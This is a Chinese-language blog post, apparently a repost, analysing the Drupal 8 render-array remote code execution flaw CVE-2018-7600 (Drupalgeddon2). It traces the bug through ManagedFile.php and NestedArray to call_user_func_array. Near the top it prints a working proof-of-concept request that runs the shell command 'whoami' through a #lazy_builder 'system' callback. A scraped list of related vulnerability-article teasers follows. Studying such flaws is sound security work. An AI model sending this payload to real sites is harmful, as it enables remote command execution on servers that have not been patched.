今天学习一下Drupal的另一个漏洞,由于渲染数组不当造成的漏洞

  poc:

url:http://localhost/drupal-8.5.0/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax

post:
'mail[a][#lazy_builder][0]': 'system',
'mail[a][#lazy_builder][1][]': 'whoami',
'form_id': 'user_register_form'

  使用poc进行测试,并在断点处观察其调用流程:

  函数的漏洞入口点在:

  \core\modules\file\src\Element\ManagedFile.php处

  

  经过explode函数处理,将get请求中的element_parents参数的值变成一个数组:即比如a/b/c变成了["a","b","c"]

  然后将处理完的$form_parents变量传给NestedArray类的getValue函数处理,其中$form包含了表单的所有信息,我们跟进一下:

  其中getValue函数就是将$form中的值逐层取出,

  

  如果$parents为a/b/c,则结果值为123

  

此时$callable变量为system,$args变量为["whoami"],然后再调用call_user_func_array()函数处理

  

转载于:https://www.cnblogs.com/wfzWebSecuity/p/10514064.html

代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API相关推荐

  1. 代码审计之CVE-2017-6920 Drupal远程代码执行漏洞学习

     1.背景介绍: CVE-2017-6920是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core. Drupal介绍:Drupal 是一个由 ...

  2. Drupal远程代码执行漏洞(CVE-2018-7600)

    目录 一. 漏洞原理 二. 影响版本 三. 漏洞环境搭建 四. 漏洞复现 一. 漏洞原理 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等 ...

  3. drupal cve-2018-7600 远程代码执行漏洞 简介

    漏洞分析 Drupal 在 3 月 28 日爆出一个远程代码执行漏洞,CVE 编号 CVE-2018-7600,通过对比官方的补丁,可以得知是请求中存在 # 开头的参数.Drupal Render A ...

  4. Drupal 修复远程代码执行漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 周三,Drupal 内容管理系统 (CMS) 发布更新,修复了和不正确清理所上传文件名称有关的一个远程代码执行漏洞 (CVE-2020 ...

  5. php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限

    此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...

  6. cve-2019-1821 思科 Cisco Prime 企业局域网管理器 远程代码执行 漏洞分析

    前言 不是所有目录遍历漏洞危害都相同,取决于遍历的用法以及用户交互程度.正如你将看到,本文的这个漏洞类在代码中非常难发现,但可以造成巨大的影响. 这个漏洞存在于思科Prime Infrastructu ...

  7. 绿盟安全事件响应观察及远程代码执行漏洞

    人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件 中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不 ...

  8. CVE-2018-8174 IE浏览器远程代码执行漏洞

    0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...

  9. 数千万聊天用户遇到挂马危险--BlueSkyCat ActiveX远程代码执行漏洞

    数千万聊天用户遇到挂马危险--BlueSkyCat ActiveX远程代码执行漏洞 文章提交:CodeAuditLabs (vulnhunt_at_gmail.com) CAL-20070730-1 ...

最新文章

  1. 找出最接近的相似串(DP思想)
  2. 快速创建包快捷键大全_99个CAD插件大全,各种工具箱和超实用辅助插件,绘图从此不卡顿...
  3. 定制Hamcrest Matchers
  4. ssh之雇员管理系统(4)-改进的hibernate测试
  5. 学英语尽量不要从背词汇表开始
  6. oracle导入excel乱码,Oracle导出的文件为什么用Excel打开是乱码?
  7. C++2022NOC之初赛数字规律
  8. vue2 + tinymce 包含自定义图片上传及视频、音频上传
  9. COLLATE LOCALIZED ASC
  10. word图文混排复制到FCKEditor图片不显示
  11. 第三十三天- 线程创建、join、守护线程、死锁
  12. 【开发细节】用C语言基础写学生管理系统(七)
  13. 【转载】2018传智播客黑马python人工智能15期视频教程
  14. 【Java基础系列教程】第二章 Java语言概述、配置环境变量
  15. JS 判断手机当前是横屏还是竖屏
  16. 海康威视推出业界首款Android系统的网络键盘:Android键盘与传统键盘对比
  17. Manacher(马拉车)
  18. 草原火势-林火蔓延模型原理及GIS应用示例
  19. 数字三位分节法(即整数部分从右向左,每隔三位用逗号分开)python实现
  20. 关于皕杰小程序打开公众号推文

热门文章

  1. 在Spring中使用JTA事务管理
  2. PHP 对象、数组间的转换
  3. 在linux查看内存的大小
  4. cisco stp技术应用
  5. 2008年5月小记(??, #, DataContractJsonSerializer, CTE Ranking top)
  6. 在WEBSTART中实现串口通信(WINDOWS版)
  7. if you can not get the full version within 1 minute
  8. MOBA项目定点数的一个想法
  9. SQLite VC环境搭建
  10. Noj-589 --糖果